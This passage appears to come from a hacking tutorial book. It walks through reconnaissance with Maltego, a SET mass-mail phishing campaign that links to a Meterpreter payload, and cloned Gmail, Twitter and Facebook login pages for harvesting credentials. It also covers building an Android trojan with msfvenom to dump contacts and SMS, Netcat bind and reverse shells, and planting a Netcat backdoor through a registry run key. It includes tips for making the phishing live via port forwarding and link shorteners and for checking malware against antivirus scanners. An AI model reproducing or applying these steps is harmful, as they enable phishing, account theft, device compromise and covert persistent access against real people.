If you master Google search and Google Advanced operators, you can have
access to anything published online such as firewalls, intrusion detection
systems, video recording systems, ups monitors, even building management
systems, IP telephones, and even credit card information and CVV
information. To have a smooth start, get yourself familiar with the list of
vulnerabilities on the exploit DB website.

Collect and Visualize Data with Maltego

The more information we have, the more likely you will be able to use that
against the system we want to exploit. Paterva is a South African based
company which is responsible for the development of Maltego, a GUI tool
that is very useful when it comes to building relationships between entities
that are found over the internet such as people and their names, their email
addresses, aliases, and a group of people with companies and organization
linked in a website, etc. It is a very useful tool.
Open Maltego from the main menu. At the very beginning, you have to
register to login to the application, you can register on this app or you can go
to paterva.com. Below is the default view after you sign in.
Transforms are tools used by Maltego to analyze the target and do a certain
and specific task. You will use them a lot. A graph is a graphical interface
that shows the relationship between these entities. Meanwhile, a machine is
used by Maltego to get the relevant information it wants.
Some of the transforms are free, but others are paid. Depending on what you
want to do, you need to buy or use the free versions.
I will install the default ones (dataprovider.com), it is very easy, just click the
install button, and it will populate the application with the relevant
transforms. Press finish and you can get yourself familiar with the menu.

To start, press on the icon there to create a graph. On the left side, you will
see the relevant entities that you can start with. The concept of Maltego is
that you drag an entity to the graph and start drilling down further on it. You
can start with the domain name, with the person, or with the company. You
have lots of entities here to start with, email address, etc. In our case, we will
start with a domain name.

Press on the domain entity and drag it to the graph, double click on the icon,
and enter the domain name you want to inquire about. Suppose that I want to
inquire about souq.com.

Press OK, and then right-click on the icon, you will see a list of transforms
related to DNS, domain owner details, email addresses that are found on this
domain, and other files. So actually, we can get lots of information just by
starting from a domain, relevant information can seek to make it easy, just
press run all and see the progress bar below.
Once it finishes, it will populate a very complex but useful graph. You see
the entity, as well the DNS records associated with this domain; you can
double click on each and see the details. It is giving you the relationship in a
top-down approach; it gives you as well, some relevant websites, the MX
records, the location of this domain, other relevant emails that are found on
this domain. As you can notice, there are names, the name servers as well,
obviously, the website, the persons whose names are found on the website,
and some telephone numbers, some emails as well, etc. Below is the graph in
zoomed out and zoomed in versions.
It is always interesting to see the emails and the persons. So as you can see
below, Shaker Qawasmi, you can right-click on this person, and just run
another transform to get more details.

As we said earlier, I am using the free transforms, there are other transforms
that are paid and you need to create an account on the website relevant to this
transformation and provide your key in order to be able to them. So let us try
to get the email address of this person just by right-clicking on him and
running the transform. And finally, we will get the email address of this
person on souq.com. So actually, it is a very handy tool, which gives you lots
of information related to the target you want to inquire about.

Execute a Phishing Attack

Phishing is a type of social engineering attack often used to steal user data,
including login credentials and credit card numbers. It happens when an
attacker, impersonating a trusted entity, tricks a victim into opening an email,
instant message, or a text message. The recipient is then tricked into clicking
a malicious link, which can lead to the installation of malware, the freezing of
the system as part of a ransomware attack, or revealing sensitive information.
We will now execute a phishing attack using the SET tool.
Open the terminal and run the SET toolkit or spot it in the main menu by
writing social engineering toolkit, choose social engineering attacks, mass
mailer attack option number five.

What do you want to do? We want to attack mass mails, not just one single
email, so select option number two, it will ask you for the path of the file that
has the list of emails. For this purpose, I have created an email list txt file,
random emails, so that I can provide the path.
Now it will ask you about your Gmail account or an open email relay. So I
will use my Gmail account for this purpose. But you can provide an open
relay for this purpose as well. The name that will appear is; email password,
do not flag for higher priority. Do you want to attach a file? I will not attach a
file, because usually file attachment like malicious file attachments are
blocked at the email control level, whatever, it is a firewall, its email filtering
system, etcetera, usually, these attacks do not work if you have an attachment
within the email. So it is better to provide a link that has the attachment, once
you click on the link, you will be able to download that attachment.
I will write a subject in my email subject, salaries for example, and then send
that email in a plain form, not HTML.

Now it will ask me about the body. In the body, I will put a link to a
malicious file, which I will be hosting on my machine. For this purpose, we
will open another terminal, and we will run the set toolkit again, we will
select social engineering, but this time, we will create a payload and a list of
option number four. So we will create this payload generated, hosted on our
web server, and put the link and the email address. We will do option number
two, create a reverse TCP Meterpreter, the host will be the local ID of our
computer, the listener, just generic number 4444. Now it should be
generating the payload on our machine, it will take some time generating
payload. And finally, you will find that the payload has been generated under
a specific path. We will copy this path. Now it is asking us if we want to start
a listener?
Yes, let us start a listener. It will initiate a Metasploit console session and a
listener will be invoked. Meanwhile, we will open a new terminal and copy
the file exe to the webroot directory. We will copy the file from the path to
www HTML.
How can I reach it?
It is the ip/payload.exe. Again, I can go to bitly.com and put my IP there, I
can ask it to shorten the IP. Copy that, go again to the first instance, and put
this in the body, we will press enter and then write END. Now, the
application will attempt to send the emails to the entire list that we have in
the provided text file.

If we go to the victim machine and check this email, we are using

tempmail.org for this purpose. We will notice that we have got a new email,
press on it, and this will be the link of the malicious file hosted on our server.
We will press on it, save the file, put it on the desktop, or you can just even
run it directly. So let us run it, if we go to my Meterpreter session, it will tell
us that a Meterpreter session has been opened, and now we have full access
to the remote computer.

Hack Facebook, Twitter, and Gmail Accounts

For anyone who has been on the internet in the past 20 years or so, hacking is
not a surprising concept. After all, a new hack is being deployed to
businesses, organizations, or individuals every 39 seconds. Many people can
recognize a “hack” email and know to avoid it, but a social media hack, now
that is a new beast! We will learn how those hackers hack into Facebook,
Twitter, and Gmail accounts.
Open the SET tool again. You will be prompted with a menu of six items, we
are interested in social engineering attacks, press one, then it will prompt you
another menu with 11 different social engineering techniques or methods to
execute. In this section, we will be interested in executing website attack
vectors. So, press on two, then select credential harvester attack method
which is number three. You will be able to select web templates that already
exist within the SET tool. Or you will be able to tell the tool to clone a
website, or you reference the tool to a custom import directory to import the
website.

We will choose option one, which will use the existing web templates in the
SET tool, IP address for the postback is the local IP address we are using. To
know it write ifconfig and you will find your IP address, press enter, then it
will tell you which you want to use.
First of all, let us use the Google template, so template number two and it will
create the file or the website under these directories. It will create a fake
Gmail website that we will use to harvest the credentials from the users. Press
Enter and now we need to think about that. You want to attempt to disable
apache, seems an apache is running and this website wants to run. So, press
yes, the harvester will be ready, have it in browser for your site. So actually,
our IP address now is hosting a fake Gmail website.
How to test that? We need to go to a browser on our Windows machine and
type the IP address of the Kali machine, and it has a Google page. For
example, type any email, and any password, and then sign in. You can
observe the behavior, it will direct you to the Google page. And if we go to
our machine, we will be able to capture the credentials.
You will get the email and password that we used.

So similarly, it can generate a report as well.

We can do the same thing for Twitter, select the Twitter template, let us
return and let us go to the website again, just try to use any email and any
password, press sign in to capture their credentials and redirect you to the
Twitter homepage. The normal user will not notice this kind of behavior.
Again, if you go to the machine, you will be able to capture the credentials.
So this is regarding the attacks for Gmail and Twitter, let us see how
Facebook works.
So, in the Facebook example, we will select custom, then we will select Site
cloner. So, select number two, and then use the localhost IP and then enter
the site that you want to clone. In this case, it is httpslogin.facebook.com. It
says that all the files have been copied, and it is running on port 80. So let us
go back again, and use the same IP, just put any email and put any password,
press log in, and you will notice again the same behavior, it will take you to
the legitimate Facebook page, and you will be able to find the credentials that
we use now are captured.
To make this a real attack you need to publish your webserver we can do so
by using port forwarding, but it is not advisable to send your public IP. We
will learn more about how to hide our identity in the upcoming sections. For
the time being, you can go to the site bitly.com, copy your public IP there.
Just copy this address, and copy it exactly, so it will give you a short link.
You can send it through email to anyone and once he presses on that, he will
be redirected to the webpage hosted on your server.

So, now we learned how to spoof Facebook, Twitter, Gmail pages, and how
to harvest the accounts. Now if you can link it to some of the techniques we
studied earlier, such as DNS poisoning, ARP poisoning, you will be able to
link the chains and come up with a real-world scenario on how to combine
social engineering with network attack techniques.
Perform Attacks on Mobile Phones
Mobile Attack Surface
Nowadays, mobile devices dominate the consumer use and habits from a
personal and enterprise perspective. Thus, they are ubiquitous and found
everywhere. The basic risk segments can be divided into five main Mobile
Application Security categories, starting from the mobile device itself, going
through network security, web service security, database security, and
application management procedures.
The mobile device risk spectrum starts with the data storage. Is the data on
the mobile device encrypted or not? About data transmission, we can talk
about HTTPS versus HTTP, STPS versus secure FTP. So, is the application
utilizing secure protocol versus open protocols?
Reverse engineering is a very important area when we talk about mobile
applications. Are there binary protections in place? If there is no binary
protections in place, anyone can have access to this mobile app and just
reverse engineer it and get the source code and get to know the details of the
architecture of the mobile app and more.
When you install an application you grant it access to local resources, is the
application having access to only the resources it needs, or it is having
elevated access? The other mobile attack surface is the network threat itself.
Here we mainly talk about HTTP versus HTTPS using SSL, using TLS,
because if you do that, it will cover all the wireless connectivity issues. You
will prevent hackers from doing session hijacking and DNS spoofing.
Thus, we need to know how these technologies work. Does it mean that if
you use SSL, you are safe? No. We will see in the following examples that
we can decrypt SSL as if we are not using SSL in the first place. So, we need
to know how to use and utilize SSL within our mobile applications.
Another important security aspect is the webserver security. Do we have any
processes in place to identify and apply critical system security patches? Do
we have a process in place to assign roles and responsibilities for people who
will take ownership of the actions performed on the webserver? do we use
processes to mitigate DDOS attacks such as captcha? do we have password
policies in place to look up attacks and to look at accounts that have been
attempting to brute force using incorrect passwords? These are trivial threats
not specifically related to the mobile attack surface, however, it is important
to mention them here.
The other attack surface is the database threat, who has privileged access to
our database? Are we sanitizing the data we are getting from applications
before we insert them into our database? Are we checking the logic of the
data we are getting from mobile apps? Are we utilizing the latest updates to
patch our database?
The last mobile attack surface is related to application management threats.
As you know, many enterprise mobile apps are distributed using application
management software. Thus, who have access to this application
management software? Who can deploy our source code to online stores such
as Google Play or Apple Store? Is our mobile app signed by the enterprise
account? Who can or who can do remote wiping either fully for the mobile
devices or partially only for the organizational data?

Decrypt TLS Sessions

TLS Decryption is the ability to view traffic inside a secure HTTP tunnel as it
passes through firewalls.
How Does HTTPS Traffic Work?
The web application, web browser, or a mobile application will request a
secure page from the server. The server will receive this request and will send
its public key along with the certificate. Now, the web browser with the
application will have to do a couple of important steps. First, it needs to make
sure that the certificate it received is not expired, it is not revoked, and it is
issued by a trusted authority. On top of that, it needs to ensure that the
common name in the certificate matches the name of the website it is
connecting to. After that, the browser will create a symmetric key and sends
it to the server by encrypting it with the public key it received in step two.
Now the server will receive this message and will decrypt it using its private
key of course.
Now the mobile application, the web browser, and the webserver, all have a
common symmetric key. The web server will encrypt its messages, its pages
information that it will send to the client using this symmetric key, and the
client will decrypt this information using the symmetric key. Taking into
consideration what I just mentioned, we will take an example of a mobile
application connecting to a server.
Looking for vulnerabilities in a mobile application presents multiple
challenges, one of which is the ability to intercept and maybe edit the
encrypted communication between the mobile device and the server it is
talking to. Knowing the content of the communication is very important
when we are looking for possible leaks of information and maybe sensitive
information.
We will learn in the upcoming example of how to set up a proxy server that
will allow us to analyze the communication taking place between the mobile
application and the server. This is usually a traditional man-in-the-middle
attack; we redirect the traffic going from the mobile application to a proxy
server. For that, we need to install the certificate issued by the proxy server,
which is a self-generated or self-signed certificate, a spoofed certificate. The
certificate needs to be installed on the mobile application, so now we are
making the communication with the proxy on our mobile reliable or trusted.
We will be able to use SSL and decrypt the communication since we have the
public and the private key.

Now we have two channels; one between the mobile and the proxy, and the
other between the proxy and the server, the channel between the mobile and
the proxy is using the fake self-generated certificate. Please note that we will
be able to look into this channel because we have the public and the private
key. The other channel is between the proxy server and the original server,
which is using the original certificate provided by the server itself.
On our mobile application, we need to change the proxy settings to refer to
the IP and the port number of the proxy we have just set up. It is good to
mention that we will be using a proxy server called Charles for this example,
but you can use any proxy servers available out there because the concept is
the same. You can use burp, you can use fiddler, and you can use a man-in-
the-middle proxy.
On top of that, you can as well download some mobile applications,
especially on Android devices that will mimic this whole setup, it will be
easier for you to just download an application which will automatically install
a certificate on the mobile and you will be able to monitor or capture the
traffic and analyze it. You can use the SSH droid or proxy droid, and many
other applications on Google store out there.
Going back to the timeline, you need to go to www.charlesproxy.com and
install the proxy from there. After that, open the application and you will be
presented by the below interface.
Now we need to go to our mobile device and route all the traffic from our
mobile through the proxy. To do so, go to the Wi-Fi connection that you are
currently using, then go to configure proxy, select manual, and then use the
server and the port, which is Charles proxy running on. Go to the help menu,
SSL proxy, and then install the certificate on the mobile device. Charles
proxy will tell you its IP and the port number that it is running on. Now we
use this information to configure our mobile to pass all the traffic through the
proxy.
Now go to the browser of the mobile, and you will notice that it tells you to
browse to n URL to download and install the certificate. So it generated a
self-signed certificate, which we need to install on our mobile device. To do
so, we open the browser and go to charles.pro/ssl, and it will prompt us to
install this profile or certificate. You just press install, again install and done,
now we have installed the certificate.
On Charles proxy, go to SSL proxy settings, where SSL proxy should be
disabled by default. We will just open a generic mobile app from our mobile
device and try to login using our generic username and password on any web
page that accepts login credentials. So just press login, and you can notice on
the left side that Charles highlighted this event that is taking place there. So if
you press on that, it will tell you that SSL proxy is not enabled, then you can
go to content and you will see that it is a scrambled content since the
connection to the server is encrypted, and we are not able to see any of this
traffic.
To do so, or to be able to see or check the tunnel, go to SSL proxy settings,
and then enable SSL proxy, keeping in mind that we have already installed
the certificate on our mobile. Press OK again, we need to go back again to
our mobile application, clear the session, and for the mobile application, we
will just log in again. You will see that activity is shown below and now you
will see that some file structure is being populated under this URL.
Press on this file, go to the Contents tab, you will be able to see the username
and password that we used, along with other information. The information on
the top is the request and the information at the bottom is the response we got
from the server. Since this is an unauthenticated response, this is what we got
from the server.

From the sequence there, you will be able to see all the connections that are
being passed through this proxy and the result. So, this is a successful
attempt. We have got some cookie information, API URL information,
although the attempt to sign in was not successful.
Go again to this mobile, try to sign in with a real username and password to
authenticate to this application. Keep in mind that we are doing this just to
test our application if it is secure over the internet.
Charles proxy generated lots of information, authorization codes, profile
related information cookies, and some internal hierarchy on the server. So,
the more you navigate through the mobile app, the more information you will
be able to get on Charles proxy.
The most important thing is that if this proxy is on, for example, a hotspot,
and users are authenticating through it, they will be able to see all this
information. Under the cookies, you will see all the information that we are
able to get. Under the text form, you will see the URL with the device token,
username, and password to authenticate. That goes for the form and the roof
format as well.
This is an important piece of information that an attacker can get to perform
another attack. I therefore recommend encrypting this information at the
application level and the code level. So do not depend on the SSL or the
encrypted tunnel; you have to take the security measures at the level of the
application itself while writing the code.
It is obvious that the mobile application we tested didn't perform some of
these steps correctly. The mobile application isn't checking if the certificate is
issued by a trusted authority; it just accepted our self-signed certificate. And
unfortunately, mobile application writers often ignore the need to check
certificates; they blindly accept any SSL certificate without understanding
how SSL works. To protect against that, you need to use certificate pinning.
When you are doing that you are checking if the certificate name matches the
webserver name that you are connected to, and once you do that, you will
automatically reject any other certificate.

Reverse Engineer an Android Application

Applications can be easily decompiled using lots of available tools. This
opens the door to many forms of abuse, such as intellectual property theft,
data leakage and data theft, credentials harvesting. On top of that, you can
clone the application, tamper it, and then publish it online again, so that
people can use it.
First of all, we need the apk file, usually you install applications on your
mobile phone, but you can extract the apk using lots of available applications.
Download a tool called apk extractor and open the application, it will
automatically load all the applications that are installed on your mobile
phone, you can just browse, and with just a click of a button, you can select
an application that you want to extract to an apk format.
Press on any application to extract the apk file to the local storage. If you go
to the local storage, you will be able to see the extracted apks under the
extracted apks folder. Now, we can move the apk files from our mobile to the
Kali machine under the extract apks directory.
You have Whatsapp installed right? Now let us try to decode that. For this
purpose, we will use the apk tool available with Kali, which decode resources
from the original file and rebuilds them after making some changes. You can
use d argument to decode and the b to build.
Type in -f-r , whatsapp.apk, and it will be started.

After the decoding is over, navigate to the resultant directory and check the
files. You will see it has organized the extracted files. Similarly, like an
Android project where you have the assets, the resources, and the Java code
itself. The assets usually are files that are not compiled within the source files
of the project. Meanwhile, resources are compiled within the Android code.
Let us drill down into the assets; you will be able to see strings compilation,
list of values, and the fonts that are being used. You can see as well the
graphics, used within the WhatsApp application. And if you go directly to the
code, the extension is SMALI. And eventually, you will be able to see all the
Java code which is extracted from the WhatsApp application. To see the
actual Java code, you need to use an application called dex2jar.
Suppose that you did some changes to the Whatsapp code, now we need to
build these files into a new apk file ready for distribution. For this purpose,
you can use apktool again, b for build and select the file, the directory name
exactly, it is WhatsApp uppercase, and then use the O argument, call it
mywhatsapp.apk, now we are building it again, but taking the changes we did
into consideration. The results will take some time, in the end, it will create
the new apk file, as shown below.
As you can see below, this is my new version of the WhatsApp called
mywhatsapp.apk.
Can we prevent hackers from decompiling our applications? Well, generally
speaking, we can make their life harder, and the harder we make it the fewer
will remain. But actually, it takes a lot of time and effort to make our record
difficult to crack, but we cannot make it impossible to crack. So here are
some of the tips that we can use in order to make the life of the hacker
difficult.
We can use code obfuscation; this is the usual word that is used. It means we
can mystify our code or we can complicate our code, we can use a couple of
applications such as ProGuard, and Dexguard, these applications actually do
a good job and can make reverse engineering difficult. It can encrypt strings
and detect code tampering. ProGuard is an open-source application, while
Dexguard is a commercial and paid application and it does a job better than
the ProGuard.
You can as well use NDK, which is the native development kit for Android to
write libraries in C and then you can import them to your Java code, which
makes it difficult to decompile. Regardless of the code complication that you
do, always try to encrypt and send messages and make sure those messages
cannot be repeated. So use some timing or some kind of sequence to assure
the integrity of the communication between the application and the server and
always authenticate your client.

Hack an Android Phone and Download its Contacts

In this section, we will learn how to hack an Android smartphone from Kali.
For this purpose, we will install an Android virtual machine on our computer.
Go to www.osboxes.org, then VM images, VirtualBox images, and install the
latest Android virtual machine.
You need to have VirtualBox installed, you just have to import the virtual
machine you have downloaded. From a Kali perspective, we will create a
malicious apk file or a malicious Android application file, and we will send it
to the end-user which is the victim in this case. Once the victim installs and
opens this application, it will create a connection between his smart-phone
and our Kali machine. For this purpose, we will use a command called
msfvenom which is a combination between the msfpayload command and
msfencode command. We will create a payload under Android meterpreter,
reverse TCP. Now we will specify the IP of our server, which is
192.168.211.142, and a local port as well, 9999 in this case.
Now we will export this to the root desktop, and we will call it for this
example, trojan.apk. Of course, in a real-world scenario, we can call it any
fancy name that tempts the user to open up and install the application. You
will notice that the process of creating this apk file is ongoing, as shown
below.

When it is done, you will need to move this file from your Kali machine to
the end-user. You can do that using various techniques such as social
engineering, for this purpose, we will copy the file from this machine to our
phone directly, and you will be able to see it under the download section as
trojan.apk.
On the other hand, now we need to create a listener on our server that will
listen to this incoming connection. Launch the Armitage application. If you
don’t have it installed then use the command apt install, Armitage. It will take
some time to load for the first time. On the left pane, type Android.
Go to the payload section and double click on reverse_tcp, you will see that
the IP is automatically populated; now we only need to match the local port
with the port that we have used when we created the apk file, as shown below
Press on launch and Armitage will start the handler locally, and it will be
waiting for connections on this port. We will go to our Android device then
to the download application and you only need to install it as usual.
Notice that when you open the mobile application, the meterpreter session
will be established and it will show you that an Android or a Linux based
device has been compromised. Now we have full access to the remote
Android phone. It is worth noting that we are doing this in a lab. But actually,
you can use it over the internet using your real IP and port forwarding. Just
right click on the compromised machine, and you can interact using the
meterpreter shell; type help and you will see all the commands that you can
invoke. You can as well explore and browse the files that exist on this phone.
We are able to see many personal files such as passwords and credit card
details. If you go again to the meterpreter session as we did earlier, with the
type of the help, you can invoke a couple of commands, such an interesting
command will be dump_contacts , it will search for the contacts on the
phone, and it will dump them locally on a file, as shown below.

So, when I did that, I found 787 contacts! Hurray.

So, let us check out this file, update our database and we will try to locate this
file. Now, we will open that using leafpad and we will get lots of accounts
with phone numbers, emails, etc.

Going back to Armitage again, another interesting command will be

dump_sms . But since this is a virtual machine, there is no SMS found, but if
you are doing areal-world attack, you will be able to get all the SMS as well
as webcam snaps using this command. And you can as well search for files.
So, the point I am trying to make here is that now you have full access to this
mobile phone and you can do whatever you want.
Maintain Access
Post-Exploitation Terminologies
Exploiting the computer as we did earlier is something awesome. But the
goal of most penetration tests is to maintain access to the compromised
system; there are a number of methodologies for maintaining access to the
exploited victim. However, the conclusion of each of these methodologies is
to reduce the time consumed and the efforts required to keep attacking the
same machine over and over after it has been exploited.
Maintaining access is a form of art that involves just as much as, if not more
thought than, exploiting the system. Below are some terminologies which
will give you a brief introduction on how to maintain access to systems after
exploiting them.
What is Malware?
Malware is a general term used for viruses, worms, trojans, key loggers, bots,
etc. It is a generic term to use when you are doing your penetration testing
report to an executive level. But when you are doing your penetration testing
report at the technical level, it is better to define the following terms:
A backdoor is a program that is left running on the compromised system to
facilitate later to enter without having to exploit the vulnerability over and
over again.
Trojan horse or simply Trojan is a malicious program that is installed onto
the host to perform the desired function. So, you install it thinking that it will
do like function ABC, but it will do function XYZ, so it conceals and hides
its intentions.
A virus is a malicious code that infects a file, it needs to be invoked by a
human, so you need to double click on the file to invoke it, and this virus will
just infect the file and the virus cannot be moved on from one machine to
another, compared to the warm which has this destructive force as the virus
but they do not need the human interaction to replicate from one target to
another, they just replicate on their own.
From our perspective, as penetration testers, we can use viruses for the sake
of compromising a system, but it is preferable not to use warm because as
you can notice, their nature is not controllable.
A key logger is a system or a code that captures the keystrokes from the user
and feeds that back to us. It is an essential tool for penetration testers in
which we use routinely.
Botnet is short for bots or short for robots, which are sometimes called
zombies. It is a network of compromised systems that are controlled by a
single computer which is called the botmaster. These systems are infected by
viruses, trojans, backdoors, etc. They are usually used to perform attacks such
as DOS, and maybe as well spam services, etc.
The idea here is that a single computer controls a bunch of computers, this
single computer, which is called the botmaster can as well control another
master in the same network if it is comprised of thousands of machines.
Adware/spyware is supposed to be a program that is designed to display
advertisements on your computer or even your phone. You see these pop-ups
going here and there, you cannot close them. They are controlled by an
Adwords software, which makes this developer gain money through pay per
click or pay per view, and it irritates the viewers in almost all cases. So once
this adware collects information and monitors your activities without your
consent, it is named a spyware.

Backdoor Tools Explained

A backdoor is a malware type that negates normal authentication procedures
to access a system. As a result, remote access is granted to various resources
within an operating system, within an application, within a database, within a
file server etc. Thus, giving perpetrators the ability to remotely issue
commands and even update the malware itself.
Better installation is achieved by taking advantage of vulnerable components
available on the remote system. The detection of these backdoors is most of
the time difficult. Web server backdoors are used for several malicious
activities such as; data theft, server hijacking, website defacing, even
launching of distributed denial of service attack, also infecting the website
visitors, and as well for advanced persistent threat assaults.
The most prevailing backdoor installation method is RFI or remote file
inclusion such as an attacker can exploit the vulnerability with an application
that dynamically references external scripts. In an RFI scenario, the
referencing function is tricked into downloading a trojan from a remote host.
Some of the websites as well, offer the function of uploading files such as
your CV and they do not take into consideration blocking PHP or other
malicious file types. You can easily use that feature to upload your backdoor
on such websites.
Typically, perpetrators identify these targets using scanners that can locate
websites having unpatched or outdated components that can enable such
remote file inclusions. We have different backdoor tools such as:
Power exploit, which is a tool mainly used for Windows machines, it can be
installed on the victim's machine, in where this tool will help the attacker
connect to the victim's machine through power shell.
Also, SBD and cryptcat are tools that are similar to the famous Netcat, they
are portable and can be easily installed on the victim's machine whether it is
Linux or Windows-based machines. They help connect to the victim's
machine remotely anytime by using a specific port in order to send remote
commands. The main difference between SBD and cryptcat is that cryptcat
can allow you to have TCP and UDP encrypted connections.

Web shells can be used to maintain access or even hack a website, most of
them are detected by antivirus and the famous ones are c99 and c100 shells.

Weevely is a PHP web shell that enables remote connection, it is a very

powerful tool that can be used as a stealth backdoor and it can be used as well
to legitimately manage websites.

HTTP tunnel is a tool that creates a bi-directional data stream tunneled into
HTTP requests and the requests can be sent to an HTTP proxy if desired.

DNS to TCP is a tunneling tool that helps pass TCP traffic through DNS
traffic, meaning on port 53. This is another important tool because most of
the times port 53 is used to legitimately identify services, as such, it is open
most of the time.
If you know the antivirus application that is running on the potential target
system, you might want to test your backdoor or trojan horse on
www.virustotal.com. This website will give you the detectability of common
and antivirus application vendors against a file that you upload. This will help
you execute a successful attack.

Netcat Simplified
In simple terms, Netcat is a computer utility for reading from and writing to
network connections using TCP or UDP. It can be used to:

Scan and connect to an arbitrary port

Create a listener on a local port
Transfer files
Remote administration (bind shell and reverse shell)
It can be invoked in the following way:
nc [flag options] [target IP address] [port]
Options we will use are:
l = listen mode,
e= program to execute after connection is established
n= don’t perform DNS lookups,
v= verbose,
p= local port
When we say reading from and writing to a network it means that the utility
runs in two modes; client mode and this server mode. Netcat is a small tool,
but it is a very powerful one, especially used forensics, as you can redirect
the file output of the local machine to the forensics workstation you are
working on.
We use Netcat to scan and connect to an arbitrary port, to create a listener on
a local port, to transfer files, and for remote administration. We will see
examples to show how to bind the shell and how to bind a reverse shell.
Netcat usually comes pre-installed on Kali Linux, but it is not installed by
default on Windows machines. So, you can go to any of these links and
download the compiled version of Windows and start using it.
https://eternallybored.org/misc/netcat/
https://sourceforge.net/projects/nc110/
The Kali machine we are using is a not published over the Internet, this it has
a private IP address, it is found before a public IP address or before a firewall
or router at this case, we will connect remotely to a Windows machine that is
hosted on the cloud, having a public IP address. Windows machine can as
well be the Windows machine that we downloaded earlier on VMware. But
for the sake of giving a real example, we will use this scenario.

In the first scenario, we will connect to ports on a remote machine. Actually,

we will scan the port and see if this port is open and connect to the port, what
we will do is to open the terminal on our Kali machine and write the
command nc for Netcat, then arguments and v for verbose, we will put the
IP address of the cloud Windows machine which is 173.248.132.230. I know
that one of the ports on this machine, which is 8010, is open. So, let us see,
the output of nc will tell us that it is connected to this IP address on port
8010, and this port is open. This tells us lots of things, first of all, it tells us
that we were able to manage to have a conversation with this cloud server,
and it tells us that Port 8010 is open.
In the next example, we will bind a port and listen to incoming connections.
We will go to the Windows Server, where we can find the Netcat files we
have downloaded from the internet earlier. These files are compiled for
Windows, just put them in a folder and navigate to the folder. you can issue
the command of nc-nlvp , and then let us select the port of 2222.
So, what are we doing here?
We are issuing the command of Netcat, and we are passing the arguments of
n as we said, do not perform DNS lookup and l for listening. What is
happening here is that Netcat is listening to the port 2222 in a verbose mode,
which is, “Show me any information about the connection”. Hit enter, and we
will see that it is listening to any connection that is coming to port 2222.

Now we will go to our Kali machine, and from there, we will connect
remotely to the cloud machine and try to open a conversation with the server,
so will issue the command and nc -nv, then the IP address 173.248.132.230.
Then we will specify the port and press enter, it will tell us that this port is
now open. So now there's a tunnel between these two computers, the Kali,
which is on the private network, and the Windows Server which is on the
internet.
So, what can we do now?
Actually, we can open a chat session, for example. So, let us say, "Hello,
from Kali" and we press enter. Now if you go to the Windows machine, you
will see this message popped up there, and from the Windows machine, I can
as well reply, "Hello from Windows machine". If I go to the Kali, I will see
that the message has been popped up there as well.

This is a simple demonstration, and I think it is not that useful to chat

between two servers, but it demonstrates the lots of capabilities of the Netcat
utility.
The third example we will show is to set up a listener and redirect any
incoming input to a file. So, we are transferring files from one computer to
another. For this purpose, we will go to our Windows machine, to exit this we
will press Control C, and from the terminal, we will issue the command of nc
-nlvp , then IP and the port, and then we decide that anything coming on this
port, please redirect it to this file, call it file output.exe.
So now it is listening, and whatever comes on this port will be redirected to
output.exe. On our Kali machine, we will transfer a file, so let us locate any
file. For this purpose, we will try and locate SPD, we will select a file dot
exe, sounds like this sbd.exe, copy it and then we will issue the command of
nc -nv , the IP address, then we will connect on the port 2222, then we will
put the SPD.

By issuing this command, we have transferred the spd.exe file from the Kali
machine to the Windows machine. If you go there, you will see that a new
status has been issued, connections from this IP address by the public IP
address of my router, so if we quit this session, and go to DIR, to list the
directory, we will be able to see this file, we will put that exe that we have
transferred from our Kali machine to our Windows machine. If we open this,
we will be able to see the file, the size, the creation date, and time of the file.
The fourth example is about the remote administration, as we saw earlier, we
have two machines; the Kali which is on our LAN, and the Windows
machine which is on the cloud. Suppose that the user using the Cloud
Machine wants remote assistance from the user using Kali machine. So, the
user using Kali will log on remotely to the user on the Windows machine.
The user on the Windows machine will issue this command, nc-nlvp , then
the port 2222, then minus -ecmd.exe. This command says, "Any user who
connects remotely on the port 2222 will be redirected to the command
prompt, the command or the console, the command.exe".
From the Kali side, we will issue this command, nc -nv , then the IP address,
then the port. When you press enter, you will be redirected to the command
line of Windows. So now you have full control to remotely manage windows
through the command line. It can list the files and the sky is the limit, now we
have full access and full control over the command line.
In the last example, suppose that the user using Kali wants remote assistance
from the user on the Windows machine, but the user on Kali is behind a
firewall and his IP is natted, so he cannot expose these services for it as the
windows guy did previously. So, in this case, we will go to the Windows
machine, and we will issue the following command, nc -nlvp and then this
port. Then from our Kali machine, we will put the following command, nc -
nv , IP address, then the port we want to connect to, then argument -E which
is to run a program, and which program we will run? Surprisingly it is the
batch, the connection is now open. If you go to our Windows machine and
run a UNIX command like ifconfig and press enter. Now we have full
remote access to the batch terminal on Kali and you will be able to see that
the IP address is 182.168.200.130, and all the other information. You can as
well issue any other command. So, as you guessed, you can use Netcat as a
backdoor to access systems. One of the drawbacks of Netcat is that the traffic
is not encrypted for that, we have an enhanced version of Netcat called Ncat.
It is important to know that because running Netcat creates open ports on
your machine, the use of Netcat can present a significant security risk if used
improperly, so make sure not to leave catch running while you are not using
it.

Install a Backdoor
Exploiting a computer is great work. However, our goal as penetration testers
is to maintain access to this compromised computer and to reduce the time
we already consumed and all the efforts we put in attacking the same
machine over and over again.
So, for this purpose, we need to install a backdoor upon our first access or
compromise. To do this, we will use Netcat. As we learned earlier in the
previous section, Netcat can act as a simple backdoor. Suppose that you have
a meterpreter session on a compromised computer, in this case, our computer
is a Windows 10 machine, and we have a meterpreter session. The first thing
we need to do is to upload this Netcat program.
For this purpose, we will issue the upload command from our meterpreter
session and we will refer to the Netcat program on our desktop. Then we will
point to the location where we need to upload it on the Windows machine. It
will be under SysWOW64.
As you know, on a windows 10 machine, which is 64-bits, you have system
32 and 64 directories, Windows automatically handles the file placement of
your 32-bit file or 64-bit files, in this case, this nc.exe is a 32-bit file, so even
if you put it in system 32, it will automatically appear in SysWOW64. To
make it easier, write the following path c:\\windows\\syswow64\\, just press
enter, and you will see that the file has been uploaded to this directory.

Go to the Windows machine and try to search for this file. You will find the
file and the upload time as well. Going back to our Kali machine, we have the
file placed on the victim’s machine, but we still need to have a mechanism
that this file is booted or loaded upon the boot of the Windows machine each
time. So each time the user restarts or boots a machine, this Netcat file will
start listening automatically.
So, for this purpose, we need to create a registry key called Netcat, that will
boot up the service every time. This will give us permanent access to the
victim's machine.
On the meterpreter session, write enum-k , to see the list of services that are
automatically run currently on this target machine. Use the command as seen
in the image below, to find there are no children or no identified key.
So now we need to create the key to set this process to run upon the boot of
the computer. Use the command of regsetval , key, and use the same value
for the key, then use the v argument for the new value and we call it Netcat.
And then we use the d for data, so the data in this registry should be
C:\windows\SysWOW64, then nc.exe and we will make it listen. The listener
daemon will be on port 6666. Now we will execute command.exe. Hit enter
and you will get a message that it has successfully set the key.

